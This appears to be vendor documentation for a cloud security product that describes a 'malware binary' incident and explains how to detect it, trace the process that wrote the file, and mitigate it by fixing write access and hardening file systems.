1. Overview

A malware binary incident indicates that a malware binary was written to the file system. A binary can be identified as malware using WildFire, Prisma Cloud advanced intelligence stream or based on a custom feed.

2. Investigation

File can be identified as malware by WildFire, Prisma Cloud advanced threat intelligence feed and custom feeds.

For files identified as malware by Wildfire, the WildFire report should be examined for additional details on the malware behavior.

A malware incident indicates an attacker has access to writing or modifying files in a container/host and might have gained full code execution.

Therefore, for investigating this incident you must first determine the source of the file write call. The process that called the file write is likely malicious, or a user may have downloaded the malware unaware of the risk.

You should further investigate how this process gained execution. Review the forensics date for the container/host, other entries in the Incident Explorer, and audits from the source, looking for unusual process execution, hijacked processes, and explicit execution of commands.

incident malware

3. Mitigation

A full mitigation strategy for this incident begins by resolving the issues that allowed the attacker to write or modify the file.

Ensure that compliance benchmarks are appropriately applied to the affected resources. For example, if the critical file systems in the host are mounted read-only, it will be more difficult for an attacker to change system files and configurations to their advantage.